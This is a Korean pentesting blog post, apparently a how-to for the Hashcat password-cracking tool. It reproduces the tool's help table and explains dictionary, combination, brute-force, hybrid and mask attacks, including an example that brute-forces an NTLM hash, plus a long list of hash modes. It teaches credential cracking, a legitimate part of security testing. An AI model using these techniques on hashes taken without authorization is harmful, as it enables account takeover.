'Pentesting' 카테고리의 글 목록

“The only thing standing between you and your goal is the bullshit story
you keep telling yourself as to why you can't achieve it.”

Pentesting

Hashcat 사용법 (Password Crack) 2023.11.15 1
hydra(FTP Crack) - MacOS hydra 설치 2022.08.10
Dumping And Cracking Unix Password Hashes 2015.01.05
Web Application Hacking Technique 분류 2014.09.15

Hashcat 사용법 (Password Crack)

2023. 11. 15. 20:14

Hashcat은,

아래와 같이 패스워드 복구 도구라고 설명하고 있지만, Pentest과정에서 패스워드 등 탈취한 Hash 값을 Crack 하기 위해 대입공격을 시도하는 도구이다.Linux, macOS, Windows에서 사용가능한 버전이 존재하며, 지원하는 알고리즘으로는 LM hash, MD4, MD5, SHA계열 등이 존재한다.
Hashcat is a password recovery tool. Versions are available for Linux, macOS, and Windows. Examples of hashcat-supported hashing algorithms are LM hashes, MD4, MD5, SHA-family and Unix Crypt formats as well as algorithms used in MySQL and Cisco PIX.

Hashcat 사용법

hashcat은 --help 명령어를 통해 option별로 자세한 설명을 제공하여 사전에 학습할 필요없이 찾아보며 바로 사용이 가능했지만, 숙달되기 전까지 찾아보는데 시간이 다소 걸려 정리의 필요성을 느꼈다.
사용법을 확인하기 위해 help명령어를 입력하여 매뉴얼을 확인한다.

MacBookPro-2 ~ % hashcat --help
hashcat (v6.2.5-532-gcd77e488d) starting in help mode
Usage: hashcat [options]... hash|hashfile|hccapxfile [dictionary|mask|directory]...

- [ Options ] -

 Options Short / Long           | Type | Description                                          | Example
================================+======+======================================================+=======================
 -m, --hash-type                | Num  | Hash-type, references below (otherwise autodetect)   | -m 1000
 -a, --attack-mode              | Num  | Attack-mode, see references below                    | -a 3
 -V, --version                  |      | Print version                                        |
 -h, --help                     |      | Print help                                           |
     --quiet                    |      | Suppress output                                      |
     --hex-charset              |      | Assume charset is given in hex                       |
     --hex-salt                 |      | Assume salt is given in hex                          |
     --hex-wordlist             |      | Assume words in wordlist are given in hex            |
     --force                    |      | Ignore warnings                                      |
     --deprecated-check-disable |      | Enable deprecated plugins                            |
     --status                   |      | Enable automatic update of the status screen         |
     --status-json              |      | Enable JSON format for status output                 |
     --status-timer             | Num  | Sets seconds between status screen updates to X      | --status-timer=1
     --stdin-timeout-abort      | Num  | Abort if there is no input from stdin for X seconds  | --stdin-timeout-abort=300
     --machine-readable         |      | Display the status view in a machine-readable format |
     --keep-guessing            |      | Keep guessing the hash after it has been cracked     |
     --self-test-disable        |      | Disable self-test functionality on startup           |
     --loopback                 |      | Add new plains to induct directory                   |
     --markov-hcstat2           | File | Specify hcstat2 file to use                          | --markov-hcstat2=my.hcstat2
     --markov-disable           |      | Disables markov-chains, emulates classic brute-force |
     --markov-classic           |      | Enables classic markov-chains, no per-position       |
     --markov-inverse           |      | Enables inverse markov-chains, no per-position       |
 -t, --markov-threshold         | Num  | Threshold X when to stop accepting new markov-chains | -t 50
     --runtime                  | Num  | Abort session after X seconds of runtime             | --runtime=10
     --session                  | Str  | Define specific session name                         | --session=mysession
     --restore                  |      | Restore session from --session                       |
     --restore-disable          |      | Do not write restore file                            |
     --restore-file-path        | File | Specific path to restore file                        | --restore-file-path=x.restore
 -o, --outfile                  | File | Define outfile for recovered hash                    | -o outfile.txt
     --outfile-format           | Str  | Outfile format to use, separated with commas         | --outfile-format=1,3
     --outfile-autohex-disable  |      | Disable the use of $HEX[] in output plains           |
     --outfile-check-timer      | Num  | Sets seconds between outfile checks to X             | --outfile-check=30
     --wordlist-autohex-disable |      | Disable the conversion of $HEX[] from the wordlist   |
 -p, --separator                | Char | Separator char for hashlists and outfile             | -p :
     --stdout                   |      | Do not crack a hash, instead print candidates only   |
     --show                     |      | Compare hashlist with potfile; show cracked hashes   |
     --left                     |      | Compare hashlist with potfile; show uncracked hashes |
     --username                 |      | Enable ignoring of usernames in hashfile             |
     --remove                   |      | Enable removal of hashes once they are cracked       |
     --remove-timer             | Num  | Update input hash file each X seconds                | --remove-timer=30
     --potfile-disable          |      | Do not write potfile                                 |
     --potfile-path             | File | Specific path to potfile                             | --potfile-path=my.pot
     --encoding-from            | Code | Force internal wordlist encoding from X              | --encoding-from=iso-8859-15
     --encoding-to              | Code | Force internal wordlist encoding to X                | --encoding-to=utf-32le
     --debug-mode               | Num  | Defines the debug mode (hybrid only by using rules)  | --debug-mode=4
     --debug-file               | File | Output file for debugging rules                      | --debug-file=good.log
     --induction-dir            | Dir  | Specify the induction directory to use for loopback  | --induction=inducts
     --outfile-check-dir        | Dir  | Specify the outfile directory to monitor for plains  | --outfile-check-dir=x
     --logfile-disable          |      | Disable the logfile                                  |
     --hccapx-message-pair      | Num  | Load only message pairs from hccapx matching X       | --hccapx-message-pair=2
     --nonce-error-corrections  | Num  | The BF size range to replace AP's nonce last bytes   | --nonce-error-corrections=16
     --keyboard-layout-mapping  | File | Keyboard layout mapping table for special hash-modes | --keyb=german.hckmap
     --truecrypt-keyfiles       | File | Keyfiles to use, separated with commas               | --truecrypt-keyf=x.png
     --veracrypt-keyfiles       | File | Keyfiles to use, separated with commas               | --veracrypt-keyf=x.txt
     --veracrypt-pim-start      | Num  | VeraCrypt personal iterations multiplier start       | --veracrypt-pim-start=450
     --veracrypt-pim-stop       | Num  | VeraCrypt personal iterations multiplier stop        | --veracrypt-pim-stop=500
 -b, --benchmark                |      | Run benchmark of selected hash-modes                 |
     --benchmark-all            |      | Run benchmark of all hash-modes (requires -b)        |
     --speed-only               |      | Return expected speed of the attack, then quit       |
     --progress-only            |      | Return ideal progress step size and time to process  |
 -c, --segment-size             | Num  | Sets size in MB to cache from the wordfile to X      | -c 32
     --bitmap-min               | Num  | Sets minimum bits allowed for bitmaps to X           | --bitmap-min=24
     --bitmap-max               | Num  | Sets maximum bits allowed for bitmaps to X           | --bitmap-max=24
     --cpu-affinity             | Str  | Locks to CPU devices, separated with commas          | --cpu-affinity=1,2,3
     --hook-threads             | Num  | Sets number of threads for a hook (per compute unit) | --hook-threads=8
     --hash-info                |      | Show information for each hash-mode                  |
     --example-hashes           |      | Alias of --hash-info                                 |
     --backend-ignore-cuda      |      | Do not try to open CUDA interface on startup         |
     --backend-ignore-hip       |      | Do not try to open HIP interface on startup          |
     --backend-ignore-metal     |      | Do not try to open Metal interface on startup        |
     --backend-ignore-opencl    |      | Do not try to open OpenCL interface on startup       |
 -I, --backend-info             |      | Show system/evironment/backend API info              | -I or -II
 -d, --backend-devices          | Str  | Backend devices to use, separated with commas        | -d 1
 -D, --opencl-device-types      | Str  | OpenCL device-types to use, separated with commas    | -D 1
 -O, --optimized-kernel-enable  |      | Enable optimized kernels (limits password length)    |
 -M, --multiply-accel-disable   |      | Disable multiply kernel-accel with processor count   |
 -w, --workload-profile         | Num  | Enable a specific workload profile, see pool below   | -w 3
 -n, --kernel-accel             | Num  | Manual workload tuning, set outerloop step size to X | -n 64
 -u, --kernel-loops             | Num  | Manual workload tuning, set innerloop step size to X | -u 256
 -T, --kernel-threads           | Num  | Manual workload tuning, set thread count to X        | -T 64
     --backend-vector-width     | Num  | Manually override backend vector-width to X          | --backend-vector=4
     --spin-damp                | Num  | Use CPU for device synchronization, in percent       | --spin-damp=10
     --hwmon-disable            |      | Disable temperature and fanspeed reads and triggers  |
     --hwmon-temp-abort         | Num  | Abort if temperature reaches X degrees Celsius       | --hwmon-temp-abort=100
     --scrypt-tmto              | Num  | Manually override TMTO value for scrypt to X         | --scrypt-tmto=3
 -s, --skip                     | Num  | Skip X words from the start                          | -s 1000000
 -l, --limit                    | Num  | Limit X words from the start + skipped words         | -l 1000000
     --keyspace                 |      | Show keyspace base:mod values and quit               |
 -j, --rule-left                | Rule | Single rule applied to each word from left wordlist  | -j 'c'
 -k, --rule-right               | Rule | Single rule applied to each word from right wordlist | -k '^-'
 -r, --rules-file               | File | Multiple rules applied to each word from wordlists   | -r rules/best64.rule
 -g, --generate-rules           | Num  | Generate X random rules                              | -g 10000
     --generate-rules-func-min  | Num  | Force min X functions per rule                       |
     --generate-rules-func-max  | Num  | Force max X functions per rule                       |
     --generate-rules-func-sel  | Str  | Pool of rule operators valid for random rule engine  | --generate-rules-func-sel=ioTlc
     --generate-rules-seed      | Num  | Force RNG seed set to X                              |
 -1, --custom-charset1          | CS   | User-defined charset ?1                              | -1 ?l?d?u
 -2, --custom-charset2          | CS   | User-defined charset ?2                              | -2 ?l?d?s
 -3, --custom-charset3          | CS   | User-defined charset ?3                              |
 -4, --custom-charset4          | CS   | User-defined charset ?4                              |
     --identify                 |      | Shows all supported algorithms for input hashes      | --identify my.hash
 -i, --increment                |      | Enable mask increment mode                           |
     --increment-min            | Num  | Start mask incrementing at X                         | --increment-min=4
     --increment-max            | Num  | Stop mask incrementing at X                          | --increment-max=8
 -S, --slow-candidates          |      | Enable slower (but advanced) candidate generators    |
     --brain-server             |      | Enable brain server                                  |
     --brain-server-timer       | Num  | Update the brain server dump each X seconds (min:60) | --brain-server-timer=300
 -z, --brain-client             |      | Enable brain client, activates -S                    |
     --brain-client-features    | Num  | Define brain client features, see below              | --brain-client-features=3
     --brain-host               | Str  | Brain server host (IP or domain)                     | --brain-host=127.0.0.1
     --brain-port               | Port | Brain server port                                    | --brain-port=13743
     --brain-password           | Str  | Brain server authentication password                 | --brain-password=bZfhCvGUSjRq
     --brain-session            | Hex  | Overrides automatically calculated brain session     | --brain-session=0x2ae611db
     --brain-session-whitelist  | Hex  | Allow given sessions only, separated with commas     | --brain-session-whitelist=0x2ae611db

hashcat 명령어 입력시 필요한 argument는 아래와 같다. 많은 옵션들이 존재하지만 주요 옵션들에 대해서 정리해 보면,,

Usage: hashcat [options]... hash|hashfile|hccapxfile [dictionary|mask|directory]...
hashcat [옵션*] [crack 대상 hash] [hash crack에 사용할 사전파일, 마스크, 디렉토리]

1. Attack mode

- a 또는 --attack-mode : Hash crack을 진행할 공격 방법
ex ) -a 0, -a 1, - a 3,

# | Mode
 ===+======
  0 | Straight  //trying all words in a list; also called “straight” mode
  1 | Combination // concatenating words from multiple wordlists
  3 | Brute-force  // trying all characters from given charsets, per position
  6 | Hybrid Wordlist + Mask //6,7 : Hybrid Wordlist + Mask, Hybrid Mask + Wordlist : combining wordlists+masks and masks+wordlists
  7 | Hybrid Mask + Wordlist
  9 | Association

- 0 : Straight

사전 공격 또는 워드리스트 공격으로 제공한 사전 파일과 비교(-a 0)

- 1 : Combination

두개의 사전을 결합하여 공격시도

사전 dict1.txt :
12345 
세상에 
테스트 통과

사전 dict2.txt :
alice
bob
cat
dog

./hashcat -m 0 -a 1 hash.txt dict1.txt dict2.txt
passalice 
passbob 
passcat 
passdog 
12345alice 
12345bob 
12345cat 
12345dog 
omgalice 
omgbob 
omgcat 
omgdog 
Testalice 
Testbob 
Testcat 
Testdog

* ./hashcat -m 0 -a 1 hash.txt dict1.txt dict1.txt 와 같이 동일한 사전으로도 가능하다
- 3 : Brute-force

keyspace의 모든 조합을 적용하여 공격하거나, 특정 마스크*를 지정하여 무작위 대입공격을 진행
* 마스크에 관한 사항은, 하단에서 설명

- 6,7 : Hybrid Wordlist + Mask, Hybrid Mask + Wordlist

사전단어와 무차별 공격(Brute-Force Attack) 또는 마스크로 생성된 단어를 합친 공격

-a 6 : example.dict ?d?d?d?d
password0000
password0001
password0002

-a 7 : ?d?d?d?d example.dict
0000password
0001password
0002password

1-1. Built-in Charsets

brute force, Hybrid 등 attack mode에서 Mask를 적용이 가능하여 Mask에 관한 내용을 살펴본다.
무차별 대입 공격은 일반적으로 decrytion 된 패스워드 9자 이상부터는 hash를 crack 하는 것이 매우 많은 시간을 필요로 하거나, 불가능하기 때문에 crack 성공할 가능성이 제한되어 있지만, 사용하는 알고리즘과 hashcat에 사용 가능한 리소스(GPU 등)에 따라 달라질 수 있다. 이와 함께, decrytion 된 문자의 형태, 형식을 어느 정도 유추 할 수 있는 상황이라면, Mask를 사용하여 원하는 문자, 길이에 제한을 둠으로써 시도하는 키값을 줄여 효율적으로 공격이 가능하다.

- [ Built-in Charsets ] -

  ? | Charset
 ===+=========
  l | abcdefghijklmnopqrstuvwxyz [a-z]    // 소문자[a-z]
  u | ABCDEFGHIJKLMNOPQRSTUVWXYZ [A-Z]    // 대문자[A-Z]
  d | 0123456789                 [0-9]    // 숫자[0-9]
  h | 0123456789abcdef           [0-9a-f] // 숫자[0-9]+소문자[a-z]
  H | 0123456789ABCDEF           [0-9A-F] // 숫자[0-9]+대문자[A-Z]
  s |  !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~   // 특수문자
  a | ?l?u?d?s                            // l+u+d+s = 소문자[a-z]+대문자[A-Z]+숫자[0-9]+특수문자
  b | 0x00 - 0xff

위의 규칙을 통해 소문자로만 공격을 시도할 것인지, 소문자와 숫자를 사용하거나 a와 같이 복합적으로 사용할 것인지를 지정할 수 있으며 추가적으로, 시도할 문자의 길이도 지정할 수 있다.
example)
- 4자리 숫자 - ?d?d?d?d,
- 8자리 무작위 글자 - ?a?a?a?a?a?a?a?a

이러한 경우는 자릿수가 고정되어, 8자리 무작위 글자(?a?a?a?a?a?a?a?a)의 경우 5자리, 6자리의 패스워드는 확인하지 않는다. 이때 -i 또는 ‐‐increment 옵션을 사용하는 경우 1자리부터 지정한 자릿수까지 순차적으로 진행한다.
* 최소, 최대 범위 지정도 가능한데, -i --increment-min=3 --increment-max=6 와 같이 사용하여 3~6자리 문자로 지정가능하며, increment-max의 범위는 위에서 지정한 마스크(8자리) 범위 이상(9자리 등)으로는 설정하여도 동작하지 않는다.

예를 통해 실제로 사용 예를 살펴보면,
example) 비밀번호 *H4ck* 의 NTLM(-m 1000) 해시를 가져와서 무차별 대입 모드(-a 3)로 공격
- hashcat -m 1000 42EF98F2E9B77304716D2AECA2F0BD96 -a3 '?a?a?a?a?a?a?a'

2. Hash modes

m 또는 --hash-type : Hash crack을 진행하고자 하는 대상 알고리즘
ex ) -m 0, -m 100, -m 1000, -m 1410
- 0 : MD5, 100 : SHA1, 1000 : NTLM, 1410 : SHA256($pass,$salt)

- [ Hash modes ] -

      # | Name                                                       | Category
  ======+============================================================+======================================
    900 | MD4                                                        | Raw Hash
      0 | MD5                                                        | Raw Hash
    100 | SHA1                                                       | Raw Hash
   1300 | SHA2-224                                                   | Raw Hash
   1400 | SHA2-256                                                   | Raw Hash
  10800 | SHA2-384                                                   | Raw Hash
   1700 | SHA2-512                                                   | Raw Hash
  17300 | SHA3-224                                                   | Raw Hash
  17400 | SHA3-256                                                   | Raw Hash
  17500 | SHA3-384                                                   | Raw Hash
  17600 | SHA3-512                                                   | Raw Hash
   6000 | RIPEMD-160                                                 | Raw Hash
    600 | BLAKE2b-512                                                | Raw Hash
  11700 | GOST R 34.11-2012 (Streebog) 256-bit, big-endian           | Raw Hash
  11800 | GOST R 34.11-2012 (Streebog) 512-bit, big-endian           | Raw Hash
   6900 | GOST R 34.11-94                                            | Raw Hash
  17010 | GPG (AES-128/AES-256 (SHA-1($pass)))                       | Raw Hash
   5100 | Half MD5                                                   | Raw Hash
  17700 | Keccak-224                                                 | Raw Hash
  17800 | Keccak-256                                                 | Raw Hash
  17900 | Keccak-384                                                 | Raw Hash
  18000 | Keccak-512                                                 | Raw Hash
   6100 | Whirlpool                                                  | Raw Hash
  10100 | SipHash                                                    | Raw Hash
     70 | md5(utf16le($pass))                                        | Raw Hash
    170 | sha1(utf16le($pass))                                       | Raw Hash
   1470 | sha256(utf16le($pass))                                     | Raw Hash
  10870 | sha384(utf16le($pass))                                     | Raw Hash
   1770 | sha512(utf16le($pass))                                     | Raw Hash
    610 | BLAKE2b-512($pass.$salt)                                   | Raw Hash salted and/or iterated
    620 | BLAKE2b-512($salt.$pass)                                   | Raw Hash salted and/or iterated
     10 | md5($pass.$salt)                                           | Raw Hash salted and/or iterated
     20 | md5($salt.$pass)                                           | Raw Hash salted and/or iterated
   3800 | md5($salt.$pass.$salt)                                     | Raw Hash salted and/or iterated
   3710 | md5($salt.md5($pass))                                      | Raw Hash salted and/or iterated
   4110 | md5($salt.md5($pass.$salt))                                | Raw Hash salted and/or iterated
   4010 | md5($salt.md5($salt.$pass))                                | Raw Hash salted and/or iterated
  21300 | md5($salt.sha1($salt.$pass))                               | Raw Hash salted and/or iterated
     40 | md5($salt.utf16le($pass))                                  | Raw Hash salted and/or iterated
   2600 | md5(md5($pass))                                            | Raw Hash salted and/or iterated
   3910 | md5(md5($pass).md5($salt))                                 | Raw Hash salted and/or iterated
   3500 | md5(md5(md5($pass)))                                       | Raw Hash salted and/or iterated
   4400 | md5(sha1($pass))                                           | Raw Hash salted and/or iterated
   4410 | md5(sha1($pass).$salt)                                     | Raw Hash salted and/or iterated
  20900 | md5(sha1($pass).md5($pass).sha1($pass))                    | Raw Hash salted and/or iterated
  21200 | md5(sha1($salt).md5($pass))                                | Raw Hash salted and/or iterated
   4300 | md5(strtoupper(md5($pass)))                                | Raw Hash salted and/or iterated
     30 | md5(utf16le($pass).$salt)                                  | Raw Hash salted and/or iterated
    110 | sha1($pass.$salt)                                          | Raw Hash salted and/or iterated
    120 | sha1($salt.$pass)                                          | Raw Hash salted and/or iterated
   4900 | sha1($salt.$pass.$salt)                                    | Raw Hash salted and/or iterated
   4520 | sha1($salt.sha1($pass))                                    | Raw Hash salted and/or iterated
  24300 | sha1($salt.sha1($pass.$salt))                              | Raw Hash salted and/or iterated
    140 | sha1($salt.utf16le($pass))                                 | Raw Hash salted and/or iterated
  19300 | sha1($salt1.$pass.$salt2)                                  | Raw Hash salted and/or iterated
  14400 | sha1(CX)                                                   | Raw Hash salted and/or iterated
   4700 | sha1(md5($pass))                                           | Raw Hash salted and/or iterated
   4710 | sha1(md5($pass).$salt)                                     | Raw Hash salted and/or iterated
  21100 | sha1(md5($pass.$salt))                                     | Raw Hash salted and/or iterated
  18500 | sha1(md5(md5($pass)))                                      | Raw Hash salted and/or iterated
   4500 | sha1(sha1($pass))                                          | Raw Hash salted and/or iterated
   4510 | sha1(sha1($pass).$salt)                                    | Raw Hash salted and/or iterated
   5000 | sha1(sha1($salt.$pass.$salt))                              | Raw Hash salted and/or iterated
    130 | sha1(utf16le($pass).$salt)                                 | Raw Hash salted and/or iterated
   1410 | sha256($pass.$salt)                                        | Raw Hash salted and/or iterated
   1420 | sha256($salt.$pass)                                        | Raw Hash salted and/or iterated
  22300 | sha256($salt.$pass.$salt)                                  | Raw Hash salted and/or iterated
  20720 | sha256($salt.sha256($pass))                                | Raw Hash salted and/or iterated
  21420 | sha256($salt.sha256_bin($pass))                            | Raw Hash salted and/or iterated
   1440 | sha256($salt.utf16le($pass))                               | Raw Hash salted and/or iterated
  20800 | sha256(md5($pass))                                         | Raw Hash salted and/or iterated
  20710 | sha256(sha256($pass).$salt)                                | Raw Hash salted and/or iterated
  21400 | sha256(sha256_bin($pass))                                  | Raw Hash salted and/or iterated
   1430 | sha256(utf16le($pass).$salt)                               | Raw Hash salted and/or iterated
  10810 | sha384($pass.$salt)                                        | Raw Hash salted and/or iterated
  10820 | sha384($salt.$pass)                                        | Raw Hash salted and/or iterated
  10840 | sha384($salt.utf16le($pass))                               | Raw Hash salted and/or iterated
  10830 | sha384(utf16le($pass).$salt)                               | Raw Hash salted and/or iterated
   1710 | sha512($pass.$salt)                                        | Raw Hash salted and/or iterated
   1720 | sha512($salt.$pass)                                        | Raw Hash salted and/or iterated
   1740 | sha512($salt.utf16le($pass))                               | Raw Hash salted and/or iterated
   1730 | sha512(utf16le($pass).$salt)                               | Raw Hash salted and/or iterated
     50 | HMAC-MD5 (key = $pass)                                     | Raw Hash authenticated
     60 | HMAC-MD5 (key = $salt)                                     | Raw Hash authenticated
    150 | HMAC-SHA1 (key = $pass)                                    | Raw Hash authenticated
    160 | HMAC-SHA1 (key = $salt)                                    | Raw Hash authenticated
   1450 | HMAC-SHA256 (key = $pass)                                  | Raw Hash authenticated
   1460 | HMAC-SHA256 (key = $salt)                                  | Raw Hash authenticated
   1750 | HMAC-SHA512 (key = $pass)                                  | Raw Hash authenticated
   1760 | HMAC-SHA512 (key = $salt)                                  | Raw Hash authenticated
  11750 | HMAC-Streebog-256 (key = $pass), big-endian                | Raw Hash authenticated
  11760 | HMAC-Streebog-256 (key = $salt), big-endian                | Raw Hash authenticated
  11850 | HMAC-Streebog-512 (key = $pass), big-endian                | Raw Hash authenticated
  11860 | HMAC-Streebog-512 (key = $salt), big-endian                | Raw Hash authenticated
  28700 | Amazon AWS4-HMAC-SHA256                                    | Raw Hash authenticated
  11500 | CRC32                                                      | Raw Checksum
  27900 | CRC32C                                                     | Raw Checksum
  28000 | CRC64Jones                                                 | Raw Checksum
  18700 | Java Object hashCode()                                     | Raw Checksum
  25700 | MurmurHash                                                 | Raw Checksum
  27800 | MurmurHash3                                                | Raw Checksum
  14100 | 3DES (PT = $salt, key = $pass)                             | Raw Cipher, Known-plaintext attack
  14000 | DES (PT = $salt, key = $pass)                              | Raw Cipher, Known-plaintext attack
  26401 | AES-128-ECB NOKDF (PT = $salt, key = $pass)                | Raw Cipher, Known-plaintext attack
  26402 | AES-192-ECB NOKDF (PT = $salt, key = $pass)                | Raw Cipher, Known-plaintext attack
  26403 | AES-256-ECB NOKDF (PT = $salt, key = $pass)                | Raw Cipher, Known-plaintext attack
  15400 | ChaCha20                                                   | Raw Cipher, Known-plaintext attack
  14500 | Linux Kernel Crypto API (2.4)                              | Raw Cipher, Known-plaintext attack
  14900 | Skip32 (PT = $salt, key = $pass)                           | Raw Cipher, Known-plaintext attack
  11900 | PBKDF2-HMAC-MD5                                            | Generic KDF
  12000 | PBKDF2-HMAC-SHA1                                           | Generic KDF
  10900 | PBKDF2-HMAC-SHA256                                         | Generic KDF
  12100 | PBKDF2-HMAC-SHA512                                         | Generic KDF
   8900 | scrypt                                                     | Generic KDF
    400 | phpass                                                     | Generic KDF
  16100 | TACACS+                                                    | Network Protocol
  11400 | SIP digest authentication (MD5)                            | Network Protocol
   5300 | IKE-PSK MD5                                                | Network Protocol
   5400 | IKE-PSK SHA1                                               | Network Protocol
  25100 | SNMPv3 HMAC-MD5-96                                         | Network Protocol
  25000 | SNMPv3 HMAC-MD5-96/HMAC-SHA1-96                            | Network Protocol
  25200 | SNMPv3 HMAC-SHA1-96                                        | Network Protocol
  26700 | SNMPv3 HMAC-SHA224-128                                     | Network Protocol
  26800 | SNMPv3 HMAC-SHA256-192                                     | Network Protocol
  26900 | SNMPv3 HMAC-SHA384-256                                     | Network Protocol
  27300 | SNMPv3 HMAC-SHA512-384                                     | Network Protocol
   2500 | WPA-EAPOL-PBKDF2                                           | Network Protocol
   2501 | WPA-EAPOL-PMK                                              | Network Protocol
  22000 | WPA-PBKDF2-PMKID+EAPOL                                     | Network Protocol
  22001 | WPA-PMK-PMKID+EAPOL                                        | Network Protocol
  16800 | WPA-PMKID-PBKDF2                                           | Network Protocol
  16801 | WPA-PMKID-PMK                                              | Network Protocol
   7300 | IPMI2 RAKP HMAC-SHA1                                       | Network Protocol
  10200 | CRAM-MD5                                                   | Network Protocol
  16500 | JWT (JSON Web Token)                                       | Network Protocol
  29200 | Radmin3                                                    | Network Protocol
  19600 | Kerberos 5, etype 17, TGS-REP                              | Network Protocol
  19800 | Kerberos 5, etype 17, Pre-Auth                             | Network Protocol
  28800 | Kerberos 5, etype 17, DB                                   | Network Protocol
  19700 | Kerberos 5, etype 18, TGS-REP                              | Network Protocol
  19900 | Kerberos 5, etype 18, Pre-Auth                             | Network Protocol
  28900 | Kerberos 5, etype 18, DB                                   | Network Protocol
   7500 | Kerberos 5, etype 23, AS-REQ Pre-Auth                      | Network Protocol
  13100 | Kerberos 5, etype 23, TGS-REP                              | Network Protocol
  18200 | Kerberos 5, etype 23, AS-REP                               | Network Protocol
   5500 | NetNTLMv1 / NetNTLMv1+ESS                                  | Network Protocol
  27000 | NetNTLMv1 / NetNTLMv1+ESS (NT)                             | Network Protocol
   5600 | NetNTLMv2                                                  | Network Protocol
  27100 | NetNTLMv2 (NT)                                             | Network Protocol
  29100 | Flask Session Cookie ($salt.$salt.$pass)                   | Network Protocol
   4800 | iSCSI CHAP authentication, MD5(CHAP)                       | Network Protocol
   8500 | RACF                                                       | Operating System
   6300 | AIX {smd5}                                                 | Operating System
   6700 | AIX {ssha1}                                                | Operating System
   6400 | AIX {ssha256}                                              | Operating System
   6500 | AIX {ssha512}                                              | Operating System
   3000 | LM                                                         | Operating System
  19000 | QNX /etc/shadow (MD5)                                      | Operating System
  19100 | QNX /etc/shadow (SHA256)                                   | Operating System
  19200 | QNX /etc/shadow (SHA512)                                   | Operating System
  15300 | DPAPI masterkey file v1 (context 1 and 2)                  | Operating System
  15310 | DPAPI masterkey file v1 (context 3)                        | Operating System
  15900 | DPAPI masterkey file v2 (context 1 and 2)                  | Operating System
  15910 | DPAPI masterkey file v2 (context 3)                        | Operating System
   7200 | GRUB 2                                                     | Operating System
  12800 | MS-AzureSync PBKDF2-HMAC-SHA256                            | Operating System
  12400 | BSDi Crypt, Extended DES                                   | Operating System
   1000 | NTLM                                                       | Operating System
   9900 | Radmin2                                                    | Operating System
   5800 | Samsung Android Password/PIN                               | Operating System
  28100 | Windows Hello PIN/Password                                 | Operating System
  13800 | Windows Phone 8+ PIN/password                              | Operating System
   2410 | Cisco-ASA MD5                                              | Operating System
   9200 | Cisco-IOS $8$ (PBKDF2-SHA256)                              | Operating System
   9300 | Cisco-IOS $9$ (scrypt)                                     | Operating System
   5700 | Cisco-IOS type 4 (SHA256)                                  | Operating System
   2400 | Cisco-PIX MD5                                              | Operating System
   8100 | Citrix NetScaler (SHA1)                                    | Operating System
  22200 | Citrix NetScaler (SHA512)                                  | Operating System
   1100 | Domain Cached Credentials (DCC), MS Cache                  | Operating System
   2100 | Domain Cached Credentials 2 (DCC2), MS Cache 2             | Operating System
   7000 | FortiGate (FortiOS)                                        | Operating System
  26300 | FortiGate256 (FortiOS256)                                  | Operating System
    125 | ArubaOS                                                    | Operating System
    501 | Juniper IVE                                                | Operating System
     22 | Juniper NetScreen/SSG (ScreenOS)                           | Operating System
  15100 | Juniper/NetBSD sha1crypt                                   | Operating System
  26500 | iPhone passcode (UID key + System Keybag)                  | Operating System
    122 | macOS v10.4, macOS v10.5, macOS v10.6                      | Operating System
   1722 | macOS v10.7                                                | Operating System
   7100 | macOS v10.8+ (PBKDF2-SHA512)                               | Operating System
   3200 | bcrypt $2*$, Blowfish (Unix)                               | Operating System
    500 | md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5)                  | Operating System
   1500 | descrypt, DES (Unix), Traditional DES                      | Operating System
  29000 | sha1($salt.sha1(utf16le($username).':'.utf16le($pass)))    | Operating System
   7400 | sha256crypt $5$, SHA256 (Unix)                             | Operating System
   1800 | sha512crypt $6$, SHA512 (Unix)                             | Operating System
  24600 | SQLCipher                                                  | Database Server
    131 | MSSQL (2000)                                               | Database Server
    132 | MSSQL (2005)                                               | Database Server
   1731 | MSSQL (2012, 2014)                                         | Database Server
  24100 | MongoDB ServerKey SCRAM-SHA-1                              | Database Server
  24200 | MongoDB ServerKey SCRAM-SHA-256                            | Database Server
     12 | PostgreSQL                                                 | Database Server
  11100 | PostgreSQL CRAM (MD5)                                      | Database Server
  28600 | PostgreSQL SCRAM-SHA-256                                   | Database Server
   3100 | Oracle H: Type (Oracle 7+)                                 | Database Server
    112 | Oracle S: Type (Oracle 11+)                                | Database Server
  12300 | Oracle T: Type (Oracle 12+)                                | Database Server
   7401 | MySQL $A$ (sha256crypt)                                    | Database Server
  11200 | MySQL CRAM (SHA1)                                          | Database Server
    200 | MySQL323                                                   | Database Server
    300 | MySQL4.1/MySQL5                                            | Database Server
   8000 | Sybase ASE                                                 | Database Server
   8300 | DNSSEC (NSEC3)                                             | FTP, HTTP, SMTP, LDAP Server
  25900 | KNX IP Secure - Device Authentication Code                 | FTP, HTTP, SMTP, LDAP Server
  16400 | CRAM-MD5 Dovecot                                           | FTP, HTTP, SMTP, LDAP Server
   1411 | SSHA-256(Base64), LDAP {SSHA256}                           | FTP, HTTP, SMTP, LDAP Server
   1711 | SSHA-512(Base64), LDAP {SSHA512}                           | FTP, HTTP, SMTP, LDAP Server
  24900 | Dahua Authentication MD5                                   | FTP, HTTP, SMTP, LDAP Server
  10901 | RedHat 389-DS LDAP (PBKDF2-HMAC-SHA256)                    | FTP, HTTP, SMTP, LDAP Server
  15000 | FileZilla Server >= 0.9.55                                 | FTP, HTTP, SMTP, LDAP Server
  12600 | ColdFusion 10+                                             | FTP, HTTP, SMTP, LDAP Server
   1600 | Apache $apr1$ MD5, md5apr1, MD5 (APR)                      | FTP, HTTP, SMTP, LDAP Server
    141 | Episerver 6.x < .NET 4                                     | FTP, HTTP, SMTP, LDAP Server
   1441 | Episerver 6.x >= .NET 4                                    | FTP, HTTP, SMTP, LDAP Server
   1421 | hMailServer                                                | FTP, HTTP, SMTP, LDAP Server
    101 | nsldap, SHA-1(Base64), Netscape LDAP SHA                   | FTP, HTTP, SMTP, LDAP Server
    111 | nsldaps, SSHA-1(Base64), Netscape LDAP SSHA                | FTP, HTTP, SMTP, LDAP Server
   7700 | SAP CODVN B (BCODE)                                        | Enterprise Application Software (EAS)
   7701 | SAP CODVN B (BCODE) from RFC_READ_TABLE                    | Enterprise Application Software (EAS)
   7800 | SAP CODVN F/G (PASSCODE)                                   | Enterprise Application Software (EAS)
   7801 | SAP CODVN F/G (PASSCODE) from RFC_READ_TABLE               | Enterprise Application Software (EAS)
  10300 | SAP CODVN H (PWDSALTEDHASH) iSSHA-1                        | Enterprise Application Software (EAS)
    133 | PeopleSoft                                                 | Enterprise Application Software (EAS)
  13500 | PeopleSoft PS_TOKEN                                        | Enterprise Application Software (EAS)
  21500 | SolarWinds Orion                                           | Enterprise Application Software (EAS)
  21501 | SolarWinds Orion v2                                        | Enterprise Application Software (EAS)
